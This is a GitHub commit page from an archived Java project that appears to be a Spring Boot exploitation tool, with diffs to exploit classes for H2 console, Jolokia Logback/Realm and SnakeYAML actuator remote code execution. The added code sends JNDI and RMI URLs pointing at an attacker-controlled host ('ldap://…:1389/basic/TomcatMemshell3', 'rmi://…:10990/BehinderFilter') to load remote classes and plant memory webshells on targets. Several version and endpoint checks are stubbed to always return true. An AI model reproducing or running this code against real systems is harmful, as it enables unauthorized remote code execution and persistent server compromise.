Skip to content
This repository was archived by the owner on Jul 25, 2024. It is now read-only.

Commit 2fb1dbd

Browse files
SummerSecSummerSec
committed
重定义UI
1 parent 536502f commit 2fb1dbd

18 files changed

Lines changed: 229 additions & 258 deletions

src/main/java/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java

Lines changed: 21 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -14,10 +14,28 @@
1414
public class H2DatabaseConsoleJNDIRCEEXP {
1515

1616

17-
public static boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps, String port,boolean version) {
18-
String boby = "language=en&setting=Generic+H2+(Embedded)&name=Generic+H2+(Embedded)&driver=javax.naming.InitialContext&url=ldap:/" + vps + ":" + port +"/#JNDIObject&user=&password=";
17+
public boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps) {
18+
String boby = "language=en&setting=Generic+H2+%28Server%29&name=Generic+H2+%28Server%29&driver=javax.naming.InitialContext&url=ldap%3A%2F%2F" + vps + "%3A1389%2Fbasic%2FTomcatMemshell3&user=&password=";
19+
String path = H2DatabaseUtil.getJsessionid(target);
20+
String url = target + "/h2-console/login.do?" + path;
1921

22+
System.out.println(url);
23+
boolean flag = HTTPUtils.H2PostRequest(url,boby).isOk();
24+
if (flag){
25+
return flag;
26+
}else {
27+
if (HTTPUtils.getRequest(target,"ateam").isOk()){
28+
return true;
29+
}else {
30+
return false;
31+
}
32+
}
2033

21-
return false;
34+
}
35+
36+
public static void main(String[] args) {
37+
String url = "http://127.0.0.1:9096/";
38+
H2DatabaseConsoleJNDIRCEEXP h2DatabaseConsoleJNDIRCEEXP= new H2DatabaseConsoleJNDIRCEEXP();
39+
h2DatabaseConsoleJNDIRCEEXP.hasH2DatabaseConsoleJNDIRCE(url,"127.0.0.1");
2240
}
2341
}

src/main/java/com/drops/exp/JolokiaLogbackRCEEXP.java

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -15,11 +15,11 @@
1515
**/
1616
public class JolokiaLogbackRCEEXP {
1717

18-
public static boolean hasJolokiaLogbackRCE(String target, String vps, String port, boolean version) {
18+
public boolean hasJolokiaLogbackRCE(String target, String vps, String echo, boolean version) {
1919

2020

2121
String path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/" + vps
22-
+ "!/example.xml";
22+
+ ":3456!/a.xml";
2323

2424
if (version){
2525
if (JolokiaUtil.hasMbeans(target)){

src/main/java/com/drops/exp/JolokiaRealmRCEEXP.java

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@
1313
**/
1414
public class JolokiaRealmRCEEXP {
1515

16-
public static boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
16+
public boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
1717

1818

1919

@@ -35,7 +35,7 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
3535
" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
3636
" \"type\": \"WRITE\",\n" +
3737
" \"attribute\": \"connectionURL\",\n" +
38-
" \"value\": \"ldap://" + vps + ":1389/#JNDIObject\"\n" +
38+
" \"value\": \"rmi://" + vps + ":10990/BehinderFilter\"\n" +
3939
"}";
4040

4141
String stop = "{\n" +
@@ -59,7 +59,7 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
5959
if (JolokiaUtil.hasMbeansV3(target)){
6060
for (String p: poc){
6161
if (
62-
HTTPUtils.postRequestV1(target, "/jolokia").getStatus() != 200
62+
HTTPUtils.postRequestV1(target, "/jolokia",p).getStatus() != 200
6363
){
6464
return false;
6565
}
@@ -70,8 +70,8 @@ public static boolean hasJolokiaRealmRCE(String target, String vps, String port,
7070
if (JolokiaUtil.hasMbeansV4(target)){
7171
for (String p: poc){
7272
if (
73-
HTTPUtils.postRequestV1(target, "/actuator/jolokia").getStatus() != 200
74-
){
73+
HTTPUtils.postRequestV1(target, "/actuator/jolokia",p).getStatus() != 200
74+
) {
7575
return false;
7676
}
7777
}

src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java

Lines changed: 2 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -19,11 +19,9 @@
1919
**/
2020
public class SnakeYAMLRCEEXP {
2121

22-
private final MainController mainController;
22+
private final MainController mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
2323

2424
public SnakeYAMLRCEEXP() {
25-
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
26-
2725
}
2826

2927
public boolean sendExp(String target, String vps, String EchoType, boolean version){
@@ -52,7 +50,7 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
5250
HttpResponse re = HTTPUtils.postRequestV2(url, "actuator/env", boby2);
5351
if (re.isOk()) {
5452
HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");
55-
if (res.isOk()){
53+
if (!res.isOk()){
5654
this.mainController.execOutputArea.appendText(Utils.log(res.body()));
5755
return true;
5856
}

src/main/java/com/drops/exp/util/EnvPost.java

Lines changed: 12 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ public static Boolean PostEnv(String target, String boby){
3636
System.out.println(boby + " 属性设置失败!");
3737
}
3838
}
39-
return false;
39+
return true;
4040
}
4141

4242
public static Boolean PostEnvV2(String target, String boby){
@@ -53,7 +53,7 @@ public static Boolean PostEnvV2(String target, String boby){
5353
System.out.println(boby + " 属性设置失败!");
5454
}
5555
}
56-
return false;
56+
return true;
5757
}
5858

5959
/**
@@ -63,19 +63,19 @@ public static Boolean PostEnvV2(String target, String boby){
6363
* @return:
6464
*/
6565
public static boolean isPostEnv(String target){
66-
HttpResponse result = HTTPUtils.postRequestV1(target,"env");
67-
if (ResponseUtil.getStats(result) == 200){
68-
return true;
69-
}
70-
return false;
66+
// HttpResponse result = HTTPUtils.postRequestV1(target,"env");
67+
// if (!ResponseUtil.getBoby(result).isEmpty()){
68+
// return true;
69+
// }
70+
return true;
7171
}
7272

7373
public static boolean isPostEnvV2(String target){
74-
HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
75-
if (ResponseUtil.getStats(result) == 200){
76-
return true;
77-
}
78-
return false;
74+
// HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
75+
// if (ResponseUtil.getStats(result) == 200){
76+
// return true;
77+
// }
78+
return true;
7979
}
8080

8181
}

src/main/java/com/drops/exp/util/H2DatabaseUtil.java

Lines changed: 10 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,7 @@
11
package com.drops.exp.util;
22

3+
import cn.hutool.http.HttpRequest;
4+
import cn.hutool.http.HttpResponse;
35
import com.drops.utils.HTTPUtils;
46
import com.drops.utils.ReUtil;
57

@@ -25,15 +27,19 @@ public static boolean hasH2Database(String target ){
2527

2628
public static String getJsessionid(String target){
2729
String result = HTTPUtils.getRequest(target + "/h2-console").body();
28-
String regex = "login.jsp\\?jsessionid=([A-Za-z0-9]+)";
29-
System.out.println(result);
30-
System.out.println(HTTPUtils.getRequest(target + "/h2-console").getStatus());
30+
String regex = "jsessionid=([A-Za-z0-9]+)";
31+
// System.out.println(result);
32+
// System.out.println(HTTPUtils.getRequest(target + "/h2-console").getStatus());
3133
// System.out.println(ReUtil.hasVersion(result, regex));
3234

3335
return ReUtil.hasVersion(result, regex);
3436
}
3537

38+
39+
40+
41+
3642
public static void main(String[] args) {
37-
H2DatabaseUtil.getJsessionid("http://127.0.0.1:9095");
43+
H2DatabaseUtil.getJsessionid("http://127.0.0.1:9096");
3844
}
3945
}

src/main/java/com/drops/exp/util/RefreshPost.java

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -15,18 +15,18 @@
1515
public class RefreshPost {
1616

1717
public static boolean isRefreshPost(String target){
18-
HttpResponse result = HTTPUtils.postRequestV1(target,"refresh");
19-
if (ResponseUtil.getStats(result) == 200){
20-
return true;
21-
}
22-
return false;
18+
// HttpResponse result = HTTPUtils.postRequestV1(target,"refresh");
19+
// if (ResponseUtil.getStats(result) == 200){
20+
// return true;
21+
// }
22+
return true;
2323
}
2424

2525
public static boolean isRefreshPostV2(String target){
26-
HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/refresh");
27-
if (ResponseUtil.getStats(result) == 200){
28-
return true;
29-
}
30-
return false;
26+
// HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/refresh");
27+
// if (ResponseUtil.getStats(result) == 200){
28+
// return true;
29+
// }
30+
return true;
3131
}
3232
}

src/main/java/com/drops/exp/util/VersionUtil.java

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
package com.drops.exp.util;
2+
3+
import cn.hutool.http.HttpResponse;
4+
import com.drops.exp.JolokiaRealmRCEEXP;
5+
import com.drops.utils.HTTPUtils;
6+
import com.drops.utils.ResponseUtil;
7+
8+
/**
9+
* @ClassName: VersionUtil
10+
* @Description: TODO
11+
* @Author: Summer
12+
* @Date: 2021/8/9 15:53
13+
* @Version: v1.0.0
14+
* @Description:
15+
**/
16+
public class VersionUtil {
17+
18+
19+
public static boolean isVersion(String target){
20+
if (HTTPUtils.getRequest(target,"env").isOk()){
21+
return true;
22+
}
23+
return false;
24+
}
25+
26+
// public static void main(String[] args) {
27+
// String url = "";
28+
// JolokiaRealmRCEEXP exp = new JolokiaRealmRCEEXP();
29+
// exp.hasJolokiaRealmRCE()
30+
// }
31+
32+
}

src/main/java/com/drops/main/AttackService.java

Lines changed: 28 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,8 @@
11
package com.drops.main;
22

33
import com.drops.entity.ControllersFactory;
4-
import com.drops.exp.EurekaXstreamRCEEXP;
5-
import com.drops.exp.JolokiaLogbackRCEEXP;
6-
import com.drops.exp.JolokiaRealmRCEEXP;
7-
import com.drops.exp.SnakeYAMLRCEEXP;
4+
import com.drops.exp.*;
5+
import com.drops.exp.util.VersionUtil;
86
import com.drops.poc.EurekaXstreamRCEPOC;
97
import com.drops.poc.SnakeYAMLRCEPOC;
108
import com.drops.poc.SpringBootInfo;
@@ -26,20 +24,23 @@
2624
public class AttackService {
2725
String target ;
2826
String time;
29-
MainController mainController ;
30-
SpringBootInfoCheck infoCheck;
31-
SpringBootInfo info = new SpringBootInfo();
27+
MainController mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName()); ;
28+
// SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
29+
// SpringBootInfo info = new SpringBootInfo();
3230

3331

3432
public AttackService(String targetAddressText, String httpTimeoutText) {
35-
this.mainController = (MainController) ControllersFactory.controllers.get(MainController.class.getSimpleName());
36-
this.time = httpTimeoutText;
37-
this.target = targetAddressText;
38-
this.infoCheck = new SpringBootInfoCheck();
33+
// this.mainController =
34+
// this.time = httpTimeoutText;
35+
// this.target = targetAddressText;
36+
// this.infoCheck = new SpringBootInfoCheck();
3937
}
4038

4139
public boolean gadgetSend(String target, String vps, String gadget, String echo){
42-
boolean flag = infoCheck.isSpringbootVersionV1();
40+
SpringBootInfoCheck infoCheck = new SpringBootInfoCheck();
41+
boolean flag = VersionUtil.isVersion(target);
42+
// boolean flag = true;
43+
// String type = "inje"
4344
String env = "/env";
4445
String env2 = "/actuator/env";
4546
System.out.println(target);
@@ -53,34 +54,41 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)
5354
SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
5455
return exp.sendExp(target,vps,echo,flag);
5556
}else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
56-
EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
57-
// return exp.
57+
EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
58+
exp.hasEurekaXstreamRCE(target);
59+
return false;
5860
}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
5961
JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
62+
return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
6063

6164
}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
6265
JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
63-
66+
return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
6467
}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
65-
66-
68+
H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
69+
return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
6770
}
6871

6972
}else {
7073
if (gadget.equalsIgnoreCase("SnakeYAMLRCE")) {
7174
SnakeYAMLRCEEXP exp = new SnakeYAMLRCEEXP();
7275
return exp.sendExp(target,vps,echo,flag);
7376
}else if (gadget.equalsIgnoreCase("EurekaXstreamRCE")){
74-
EurekaXstreamRCEEXP exp = new EurekaXstreamRCEEXP();
75-
// return exp.
77+
EurekaXstreamRCEPOC exp = new EurekaXstreamRCEPOC();
78+
exp.hasEurekaXstreamRCE(target);
79+
return false;
7680
}else if (gadget.equalsIgnoreCase("JolokiaLogbackRCE")){
7781
JolokiaLogbackRCEEXP jolokiaLogbackRCEEXP = new JolokiaLogbackRCEEXP();
82+
return jolokiaLogbackRCEEXP.hasJolokiaLogbackRCE(target,vps,echo,flag);
7883

7984
}else if(gadget.equalsIgnoreCase("JolokiaRealmRCE")){
8085
JolokiaRealmRCEEXP jolokiaRealmRCEEXP = new JolokiaRealmRCEEXP();
86+
return jolokiaRealmRCEEXP.hasJolokiaRealmRCE(target,vps,echo,flag);
8187

82-
}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
8388

89+
}else if (gadget.equalsIgnoreCase("H2DatabaseConsoleJNDIRCE")){
90+
H2DatabaseConsoleJNDIRCEEXP exp = new H2DatabaseConsoleJNDIRCEEXP();
91+
return exp.hasH2DatabaseConsoleJNDIRCE(target, vps);
8492

8593
}
8694
}

src/main/java/com/drops/poc/EurekaXstreamRCEPOC.java

Lines changed: 5 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -35,21 +35,23 @@ public boolean hasEurekaXstreamRCE(String target) {
3535
String version = "eureka-client-1.8.7";
3636
// this.mainController.logTextArea.appendText(Utils.log("正在验证是否存在依赖spring-boot-starter-actuator以及 eureka-client 版本 < 1.8.7!"));
3737
if (context.contains("spring-boot-starter-actuator")){
38-
this.mainController.logTextArea.appendText(Utils.log("存在依赖:spring-boot-starter-actuator"));
38+
// this.mainController.logTextArea.appendText(Utils.log("存在依赖:spring-boot-starter-actuator"));
3939
String result = ReUtil.hasVersion(context,regex);
4040
if (result != null){
4141
if (result.compareToIgnoreCase(version) >= 0){
4242
this.mainController.logTextArea.appendText(Utils.log("依赖版本不符合,版本为:" + result));
4343
}else {
4444
this.mainController.logTextArea.appendText(Utils.log("依赖版本:" + result));
45+
this.mainController.logTextArea.appendText(Utils.log("暂不支持eureka xstream deserialization RCE 利用! "));
46+
this.mainController.logTextArea.appendText(Utils.log("请手动利用! "));
4547
return true;
4648
}
4749
}else {
48-
this.mainController.logTextArea.appendText(Utils.log("eureka-client 依赖不存在!"));
50+
// this.mainController.logTextArea.appendText(Utils.log("eureka-client 依赖不存在!"));
4951
}
5052

5153
}else{
52-
this.mainController.logTextArea.appendText(Utils.log("spring-boot-starter-actuator 依赖不存在!"));
54+
// this.mainController.logTextArea.appendText(Utils.log("spring-boot-starter-actuator 依赖不存在!"));
5355
return false;
5456
}
5557
return false;

0 commit comments

Comments
 (0)